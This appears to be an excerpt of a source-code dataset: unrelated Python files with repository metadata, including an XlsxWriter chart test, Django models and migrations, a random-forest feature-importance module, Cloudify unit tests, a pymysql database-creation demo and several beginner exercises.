result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteLogStreamRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
0dacff2c236fe90e948a6c0b3fecb7e82d6c3d1a
|
d05a59feee839a4af352b7ed2fd6cf10a288a3cb
|
/xlsxwriter/test/comparison/test_chart_font04.py
|
bf7ebe1e1cb139da22fb9e4d7fff60c429f6eb5e
|
[
"BSD-2-Clause-Views"
] |
permissive
|
elessarelfstone/XlsxWriter
|
0d958afd593643f990373bd4d8a32bafc0966534
|
bb7b7881c7a93c89d6eaac25f12dda08d58d3046
|
refs/heads/master
| 2020-09-24T06:17:20.840848
| 2019-11-24T23:43:01
| 2019-11-24T23:43:01
| 225,685,272
| 1
| 0
|
NOASSERTION
| 2019-12-03T18:09:06
| 2019-12-03T18:09:05
| null |
UTF-8
|
Python
| false
| false
| 1,669
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_font04.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'bar'})
chart.axis_ids = [43944960, 45705472]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
chart.set_title({
'name': '=Sheet1!$A$1',
'name_font': {'bold': 0, 'italic': 1},
})
chart.set_x_axis({
'name': 'Sheet1!$A$2',
'name_font': {'bold': 0, 'italic': 1},
})
chart.set_y_axis({
'name': '=Sheet1!$A$3',
'name_font': {'bold': 1, 'italic': 1},
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
4a11b48179794959d216c089d888dbd02e6e7ace
|
cbf3482a35083844a34d9fdfb6d9754164b8c8f7
|
/blog/migrations/0030_postlike.py
|
c1fd1ad7536e7b8009c153d81e8af6146d316cf6
|
[] |
no_license
|
sopilnyak/technotrack-web1-spring-2017
|
f27abb15f2f563b44a544c430e743d961a0d11a9
|
5f4573b417d71347f746660754faae3166be854f
|
refs/heads/master
| 2021-01-21T08:15:21.078499
| 2017-04-17T17:02:55
| 2017-04-17T17:02:55
| 83,340,481
| 0
| 0
| null | 2017-02-27T17:59:56
| 2017-02-27T17:59:56
| null |
UTF-8
|
Python
| false
| false
| 878
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-17 01:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0029_auto_20170417_0124'),
]
operations = [
migrations.CreateModel(
name='PostLike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
],
),
]
|
[
"o.sopilniak@gmail.com"
] |
o.sopilniak@gmail.com
|
f08c3e33a0eea3128e92594b3a26b4ec9ff3d9d2
|
ce2474b35aaa600947ee4bfcd521f90382f2eb15
|
/test_lcm_simulation.py
|
10209a6f4a6c74d14d0e09d6505c0a0b0009f4bb
|
[] |
no_license
|
SEMCOG/semcog_urbansim
|
9ebb5ea8fa195570ff659d8dc40b3c8e86d23a89
|
07809c2f03ea43a43c8d801b08d500f2aaf139f3
|
refs/heads/forecast_2050
| 2023-08-17T23:31:31.845339
| 2023-08-17T20:52:22
| 2023-08-17T20:52:22
| 37,195,829
| 7
| 12
| null | 2023-09-07T15:54:18
| 2015-06-10T12:29:19
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,039
|
py
|
import orca
import os
import yaml
from urbansim_templates.models import LargeMultinomialLogitStep
from urbansim_templates import modelmanager as mm
mm.initialize('configs/elcm_2050')
def generate_yaml_configs():
hlcm_yaml = os.listdir('configs/hlcm_2050')
hlcm_yaml = ["hlcm_2050/"+path for path in hlcm_yaml if '.yaml' in path]
elcm_yaml = os.listdir('configs/elcm_2050')
elcm_yaml = ["elcm_2050/"+path for path in elcm_yaml if '.yaml' in path]
obj = {
'hlcm': hlcm_yaml,
'elcm': elcm_yaml
}
with open("./configs/yaml_configs_2050.yaml", 'w') as f:
yaml.dump(obj, f, default_flow_style=False)
if __name__ == "__main__":
generate_yaml_configs()
import models
orca.add_injectable('year', 2020)
orca.run(["build_networks_2050"])
orca.run(["neighborhood_vars"])
# set year to 2050
orca.add_injectable('year', 2030)
orca.run(["mcd_hu_sampling"])
# orca.run(['elcm_800003'])
orca.run(['hlcm_125'])
orca.run(['nonres_repm11'])
print('done')
|
[
"xie@semcog.org"
] |
xie@semcog.org
|
f052c9274c97d671c506f9299e5eac7729340135
|
edb0a9a6649296968076024ce9dbd64f91a79d4e
|
/Codes/tmp.py
|
3869b97a7dff099b932375203c076defc389772e
|
[] |
no_license
|
Pierre-FrancoisW/Master-Thesis
|
94f1253345ee5a0f88c9c95c913d1ac5dfb67666
|
f1e4bb02194c43753855b17589a32ff281396d98
|
refs/heads/main
| 2023-07-13T21:58:24.058295
| 2021-08-25T09:58:08
| 2021-08-25T09:58:08
| 399,195,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,447
|
py
|
import numpy as np
#
# Official Code for Classification_local_mda
#
counter = 0
counter1 = 0
counter2 = 0
def prob_node_left(tree, node, uniform):
# [tree.children_left[node]] = node + 1 as long as node is not a leaf
if uniform:
return 0.50
else:
return tree.n_node_samples[tree.children_left[node]] / tree.n_node_samples[node]
def exploreC(tree, node, children_right_view, sample, feature_view, x, uniform):
global counter, counter1, counter2
# Stop exploration as we meet a leaf
if tree.feature[node] == -2:
value = tree.value[node].ravel() / tree.value[node].max()
return value
# else check current split and define next direction
# Propagate the sample in both directions if the feature of interest is tested at #node = 'node'
elif feature_view[node] == x:
counter += 1
l_prob = prob_node_left(tree, node, uniform)
r_prob = 1 - l_prob
value1 = exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform)
value2 = exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)
return l_prob * value1 + r_prob * value2
else:
if sample[tree.feature[node]] <= tree.threshold[node]:
counter1 += 1
# left child is next node
return exploreC(tree, node+1, children_right_view, sample, feature_view, x, uniform)
else:
counter2 += 1
return exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)
def weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform):
dir = 'left'
node = nodes_id[0]
# direction of sample at split
if leaf >= children_right_view[node]:
dir = 'right'
l_prob = prob_node_left(tree, nodes_id[0], uniform)
r_prob = 1 - l_prob
if l_prob > 1:
print("Error lprob")
if r_prob > 1:
print("Error rightprob")
# print(l_prob, " ", r_prob)
# print(dir)
if nodes_id.size == 1:
if dir == 'left':
# propagate the sample to the right as the decision path goes left at #node = 'node'
value = (prediction * l_prob) + (r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform))
return (prediction * l_prob) + (r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform))
else:
# propagate the sample to the left as the decision path goes right
value = (prediction * r_prob) + (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform))
return (prediction * r_prob) + (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform))
nodes_id = nodes_id[1:]
if dir == 'left':
value1 = r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)
value2 = l_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform)
return (r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)) + (l_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform))
else:
value = (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform)) + (r_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform))
return (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform)) + (r_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform))
def compute_mda_local_treeC(Ctree, X, nsamples, nfeatures,nclass, vimp, uniform):
# use Ctree.value[node]
children_left_view = Ctree.children_left
children_right_view = Ctree.children_right
feature_view = Ctree.feature
feature_range = list(range(nfeatures))
node_indicator = Ctree.decision_path(X)
node = 0
ifeat = 0
for i in range(nsamples):
# features of decision path (from 0 to n_features-1)
# Discard leaf from node path
features = feature_view[node_indicator[i, :].indices][:-1]
unique_f = np.unique(features)
# node id of decision path
nodes = node_indicator[i, :].indices[:-1]
prediction = Ctree.predict(X)[i].ravel()
prediction = prediction/ np.max(prediction)
leaf = node_indicator[i, :].indices[-1]
for x in unique_f:
# nodes id of the decision path of sample i that test feature 'x'
nodes_id = nodes[features == x]
val = weighted_prediction_C(Ctree, prediction, nodes_id, leaf, children_right_view, X[i], feature_view, x, uniform)
vimp[i, x, :] = vimp[i, x, :] + val
return vimp
def compute_mda_local_ens_C(ens, X, uniform):
nsamples = X.shape[0]
nfeatures = X.shape[1]
nclass = ens.classes_.size
vimp = [[[0.0 for x in range(nclass)] for y in range(nfeatures)] for x in range(nsamples)]
vimp = np.array(vimp)
# Dim1 : samples, Dim2: feature, Dim3: class
nestimators = ens.n_estimators
for i in range(nestimators):
# print("o", end='', flush=True)
vimp = compute_mda_local_treeC(ens.estimators_[i].tree_, X, nsamples, nfeatures,nclass, vimp, uniform)
print("")
vimp /= (ens.n_estimators)
for i in range(0,nsamples):
for j in range(0,nfeatures):
vimp[i, j, :] = vimp[i, j, :] * (1/sum(vimp[i, j, :]))
print("counter equals {}".format(counter))
print("counter 1 equals {}".format(counter1))
print("counter 2 equals {}".format(counter2))
return vimp
def Classification_vimp(vimp, predictions, y,):
nsamples, nfeatures, c = vimp.shape
vimp2 = np.zeros((nsamples, nfeatures))
for i in range(0,nsamples):
for j in range(0,nfeatures):
#vimp2[i,j] = sum(vimp[i,j,:]) - vimp[i,j,y[i]]
vimp2[i, j] = (1 - predictions[i][y[i]]) - (1 - vimp[i, j, y[i]])
return vimp2
|
[
"noreply@github.com"
] |
Pierre-FrancoisW.noreply@github.com
|
e80667808902da02160f366d3c3fbe610cd032e0
|
831451f5d88c630ce5d3c6f495a016118a0c36ad
|
/rest-service/manager_rest/test/endpoints/test_depup_utils.py
|
73784be30c89ee0bd8b6a472e95d6ca2fd8ede88
|
[
"Apache-2.0"
] |
permissive
|
TS-at-WS/cloudify-manager
|
8c3eb713a2f86da6e6cde1d976969733db53f2dd
|
3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc
|
refs/heads/master
| 2021-03-04T22:18:25.591541
| 2020-03-02T16:03:41
| 2020-03-09T09:19:26
| 246,069,993
| 0
| 0
|
Apache-2.0
| 2020-07-29T16:35:22
| 2020-03-09T15:18:04
| null |
UTF-8
|
Python
| false
| false
| 2,658
|
py
|
import unittest
from manager_rest.deployment_update import utils
class DeploymentUpdateTestCase(unittest.TestCase):
def test_traverse_object(self):
object_to_traverse = {
'nodes': {
'n1': 1,
'n2': ['l2', {'inner': [3]}]
}
}
# assert the value returned from a dictionary traverse
self.assertEqual(
utils.traverse_object(object_to_traverse, ['nodes', 'n1']), 1)
# assert access to inner list
self.assertEqual(utils.traverse_object(object_to_traverse,
['nodes', 'n2', '[0]']), 'l2')
# assert access to a dict within a list within a dict
self.assertEqual(utils.traverse_object(object_to_traverse,
['nodes', 'n2', '[1]', 'inner', '[0]']), 3)
self.assertDictEqual(object_to_traverse,
utils.traverse_object(object_to_traverse,
[]))
def test_create_dict_with_value(self):
dict_breadcrumb = ['super_level', 'mid_level', 'sub_level']
self.assertDictEqual({'super_level': {
'mid_level': {
'sub_level': 'value'
}
}}, utils.create_dict(dict_breadcrumb, 'value'))
def test_create_dict_with_no_value(self):
dict_breadcrumb = ['super_level', 'mid_level', 'sub_level', 'value']
self.assertDictEqual({'super_level': {
'mid_level': {
'sub_level': 'value'
}
}}, utils.create_dict(dict_breadcrumb))
def test_get_raw_node(self):
blueprint_to_test = {
'nodes': [{'id': 1, 'name': 'n1'}, {'id': 2, 'name': 'n2'}]
}
# assert the right id is returned on existing node
self.assertDictEqual(utils.get_raw_node(blueprint_to_test, 1),
{'id': 1, 'name': 'n1'})
# assert no value is returned on non existing id
self.assertEqual(len(utils.get_raw_node(blueprint_to_test, 3)), 0)
# assert nothing is return on invalid blueprint
self.assertEqual(len(utils.get_raw_node({'no_nodes': 1}, 1)), 0)
def test_parse_index(self):
self.assertEqual(utils.parse_index('[15]'), 15)
self.assertFalse(utils.parse_index('[abc]'))
self.assertFalse(utils.parse_index('[1a]'))
self.assertFalse(utils.parse_index('~~[]'))
def test_check_is_int(self):
self.assertTrue(utils.check_is_int('123'))
self.assertFalse(utils.check_is_int('abc'))
self.assertFalse(utils.check_is_int('ab12'))
|
[
"mxmrlv@gmail.com"
] |
mxmrlv@gmail.com
|
7279f4e7aeaa3ac8756f44479f75a752a49c2500
|
aa0ff41682eb3b66d3577eb806821126a2d3ace2
|
/18. 四数之和/four_sum.py
|
16af2dc43c31588b055445608fc94fa557c1fe79
|
[] |
no_license
|
qybing/LeetCode
|
11c3b88b7536ae4790d1b481f37741b2c5e9bcce
|
bafa85fde597a17b6dee8cfdd0153a7176ff8fcf
|
refs/heads/master
| 2023-02-06T09:14:29.516336
| 2020-12-30T07:33:37
| 2020-12-30T07:33:37
| 103,499,568
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,141
|
py
|
#! python3
# _*_ coding: utf-8 _*_
# @Time : 2020/5/19 9:58
# @Author : Jovan
# @File : four_sum.py
# @desc :
def fourSum(nums, target):
nums.sort()
length = len(nums)
result = []
for i in range(length):
if i >= 1 and nums[i] == nums[i - 1]:
continue
for j in range(i + 1, length):
if j > i+1 and nums[j] == nums[j-1]:
continue
start = j + 1
end = length - 1
while start < end:
sum_ = nums[i] + nums[j] + nums[start] + nums[end]
if sum_ < target:
start += 1
elif sum_ > target:
end -= 1
else:
result.append([nums[i], nums[j], nums[start], nums[end]])
while start < end and nums[start+1] == nums[start]:
start += 1
while start < end and nums[end-1] == nums[end]:
end -= 1
end -= 1
start += 1
return result
nums = [1, 0, -1, 0, -2, 2]
target = 0
print(fourSum(nums, target))
|
[
"qiaoyanbing1@163.com"
] |
qiaoyanbing1@163.com
|
bf806c4adf32732ebf9c1fe7bd0d8226e8786132
|
c6f95907558349991ed5d350359b51ad4af4b634
|
/projectName/subpackage_1/__init__.py
|
a39f8fe5b38d180873bc20e04f625c8771462801
|
[] |
no_license
|
mitchell-dawson/untitledProject
|
e773802e007c1c1759985f68cfd665e080f2b763
|
f54687d45c2ce787394d7f34244926c9993638ac
|
refs/heads/main
| 2023-01-23T22:34:00.442837
| 2020-11-27T16:40:51
| 2020-11-27T16:40:51
| 316,551,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
# General store format (access everything, no order)
from .moduleA import *
# online store format
# import .moduleB
# import .moduleB
|
[
"mitchell.dawson7@hotmail.com"
] |
mitchell.dawson7@hotmail.com
|
0e252a730c01e23c0749c29858d12daba11eeda6
|
d89aa6be7a7661c9955d143eed11cb8a526091c4
|
/src/main/com/dong/database/demo/mysql/create_database.py
|
04036f11a7250d5ae3368e7f379eefb496bbb472
|
[] |
no_license
|
weidongcao/finance_spider
|
366e209371319b961c587dfdcd37eed5dcb06a6d
|
4e210548d93c9d01101b26556f4342099df67c37
|
refs/heads/master
| 2021-01-24T04:34:34.367440
| 2019-08-25T07:03:14
| 2019-08-25T07:03:14
| 122,943,048
| 5
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
"""
通过Python,连接Mysql并创建数据库配置实例
"""
import pymysql
db = pymysql.connect(host='cm02.spark.com', user='root', password='123123', port=3306)
cursor = db.cursor()
cursor.execute('select version()')
data = cursor.fetchone()
print('Database version: ', data)
cursor.execute('create database spiders default character set utf8 collate utf8_general_ci')
db.close()
|
[
"1774104802@qq.com"
] |
1774104802@qq.com
|
e440d2c140932d115fb47dd81b71b07e16609724
|
6189f34eff2831e3e727cd7c5e43bc5b591adffc
|
/WebMirror/management/rss_parser_funcs/feed_parse_extractLuxiufer.py
|
4e0f1d83bb26fb14a4a67239ee9051bb1a167144
|
[
"BSD-3-Clause"
] |
permissive
|
fake-name/ReadableWebProxy
|
24603660b204a9e7965cfdd4a942ff62d7711e27
|
ca2e086818433abc08c014dd06bfd22d4985ea2a
|
refs/heads/master
| 2023-09-04T03:54:50.043051
| 2023-08-26T16:08:46
| 2023-08-26T16:08:46
| 39,611,770
| 207
| 20
|
BSD-3-Clause
| 2023-09-11T15:48:15
| 2015-07-24T04:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 342
|
py
|
def extractLuxiufer(item):
"""
Parser for 'Luxiufer'
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if 'WATTT' in item['tags']:
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False
|
[
"something@fake-url.com"
] |
something@fake-url.com
|
180e788b1edfb6a7fbd2064e95711bc278e96ab5
|
b737ed73e7b64c004c56b57e80aaa884a25ec98a
|
/likeapp/models.py
|
63ab1110009de6bfd4179e04b5724ac59fe0bb83
|
[] |
no_license
|
sungwoni/cyber_public_sphere
|
1ec5425c3afb16d0f0b2a1fd6ad97599f5dd2885
|
da18b1cd8ce6588d1f197fa3df30ae68df8fe6f5
|
refs/heads/main
| 2023-07-23T09:33:49.648546
| 2021-08-19T01:54:48
| 2021-08-19T01:54:48
| 397,192,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 419
|
py
|
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from articleapp.models import Article
class LikeRecord(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='like_record')
article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='like_record')
class Meta:
unique_together = ('user', 'article')
|
[
"tjddnjs2013@gmail.com"
] |
tjddnjs2013@gmail.com
|
0ab9edfe9c90a6220e8a5bc16a7c65fa0ab9536e
|
6e6b4aff225fc068f2d87ee19b7bfb1d9a0e7607
|
/greedy/DNA(1969).py
|
1dfab44544626789f6a1215df99669d41856d154
|
[] |
no_license
|
pjok1122/baekjoon-online-judge-practice
|
cc4489c9dc2cd9dd4841fed7e0f6fa9827f7154a
|
2a9b7dd6342a255bb1e6b644082f40d6ef940290
|
refs/heads/master
| 2020-07-07T23:01:09.736034
| 2020-05-11T11:08:46
| 2020-05-11T11:08:46
| 203,498,880
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
'''
주어진 DNA 문자열에서 Hamming Distance의 합이 최소가 되도록 하는 문제.
1. 가장 많이 등장하는 뉴클레오티드('문자')를 세고 그 값을 Max로 설정. 가장 많이 등장하는 문자가 H.D가 최소가 되도록 하므로 DNA 결과(result)에 포함시킨다.
2. 하나의 뉴클레오티드가 결정될 때마다 H.D의 값은 N - Max 만큼 증가한다.
3. 시간복잡도 : O(N*M) ~ O(N)
'''
N,M = map(int,input().split())
dna = []
result =''
hd = 0
for i in range(N):
dna.append(input())
for i in range(M):
cnt = [0,0,0,0]
for j in range(N):
if dna[j][i] == 'A':
cnt[0] +=1
elif dna[j][i] =='C':
cnt[1] +=1
elif dna[j][i] == 'G':
cnt[2] +=1
elif dna[j][i] == 'T':
cnt[3] +=1
Max = max(cnt)
idx = cnt.index(Max)
if idx ==0:
result+='A'
elif idx==1:
result+='C'
elif idx==2:
result+='G'
elif idx==3:
result+='T'
hd += N - Max
print(result)
print(hd)
|
[
"pjok1122@naver.com"
] |
pjok1122@naver.com
|
2ddc82f3173503e7a5e90c47ea1549b0f769cc44
|
496ba1638338c2c548c612cfb4264f28bbab85e0
|
/utilities/ClientOperation.py
|
2fc6b1dfa1f4bedbf9b4cee2af964e3f5f67b3a0
|
[] |
no_license
|
CreativeeBlackWolf/chat
|
e1673e8990af1d3c3ba0f5d2c4c789b8f318fdf2
|
f3f1891fe976460093c829d54938dfeda85a5f52
|
refs/heads/main
| 2023-02-27T11:23:51.327445
| 2021-02-01T18:18:23
| 2021-02-01T18:18:23
| 335,032,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
import json
class ClientOperation:
def __init__(self, type, **kwargs):
self.type = type
if self.type == "messageArrived":
# both str instances, content and author of the message
self.content = kwargs["messageContent"]
self.author = kwargs["messageAuthor"]
elif self.type == "channelLeave":
pass
elif self.type == "requireUsername":
pass
elif self.type == "usersList":
self.users = kwargs["users"]
elif self.type == "channelCreateInfo":
# str instance, answer of the server (can be anything)
self.answer = kwargs["answer"]
elif self.type == "channelJoinInfo":
# str instance, channel port, can be 404 (not found) or 500 (server error)
self.port = kwargs["port"]
# str instance, channel name, can be None
self.channelName = None if self.port in ["404", "500"] else kwargs["channelName"]
elif self.type == "channelInfo":
# str instance, but can be None
self.port = kwargs["port"]
elif self.type == "channelList":
# dict instance (str actually, but dumped from dict)
# {"channelName": "port"}
self.channels = json.loads(kwargs["channels"])
|
[
"creativeeblackwolf@gmail.com"
] |
creativeeblackwolf@gmail.com
|
901b04d91b82ae5953029503be57765f7213c0e2
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-5/73faa376ad87004014356477048e7298d06de792-<remove_custom_def>-fix.py
|
399fefca0541ee754193ead44addaf401950bbcb
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133
| 2021-10-23T14:11:22
| 2021-10-23T14:11:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
def remove_custom_def(self, field):
changed = False
f = dict()
for x in self.custom_field_mgr:
if ((x.name == field) and (x.managedObjectType == vim.VirtualMachine)):
changed = True
if (not self.module.check_mode):
self.content.customFieldsManager.RemoveCustomFieldDef(key=x.key)
break
f[x.name] = (x.key, x.managedObjectType)
return {
'changed': changed,
'failed': False,
'custom_attribute_defs': list(f.keys()),
}
|
[
"dg1732004@smail.nju.edu.cn"
] |
dg1732004@smail.nju.edu.cn
|
25c2d35b1ad3349af246ac423d420173e50b00d2
|
9d3b8d5f45e5407f3275542cf5792fd2510abfe4
|
/Chapter8-Practice/test_8.4.1.py
|
d34f4b2acda4c2f610a12866949f272167402672
|
[] |
no_license
|
Beautyi/PythonPractice
|
375767583870d894801013b775c493bbd3c36ebc
|
9104006998a109dcab0848d5540fb963b20f5b02
|
refs/heads/master
| 2020-04-23T09:58:50.065403
| 2019-04-08T02:55:52
| 2019-04-08T02:55:52
| 171,088,504
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,544
|
py
|
#在函数中修改列表
#首先创建一个列表,其中包含一些要打印的设计
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
#模拟打印每个设计,直到没有未打印的设计为止。打印后转移到completed_models中
while unprinted_designs:
current_design = unprinted_designs.pop()
#模拟根据设计制作的3D打印模型的过程
print("Printing model: " + current_design)
completed_models.append(current_design)
#显示打印好的模型
print("\nThe following models have been printed:")
for completed_model in completed_models:
print(completed_model)
#可以分两个函数,第一个函数负责处理打印设计的工作,第二个函数将概述打印了哪些设计
def print_models(unprinted_designs, completed_models):#包含两个形参
"""模拟打印每个设计,直到没有未打印的设计为止。打印后转移到completed_models中"""
while unprinted_designs:
current_design = unprinted_designs.pop()
#模拟根据设计制作的3D打印模型的过程
print("Printing model: " + current_design)
completed_models.append(current_design)
def show_completed_models(completed_models):
"""显示打印好的所有模型"""
for completed_model in completed_models:
print(completed_model)
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
print_models(unprinted_designs, completed_models)
show_completed_models(completed_models)
|
[
"1210112866@qq.com"
] |
1210112866@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.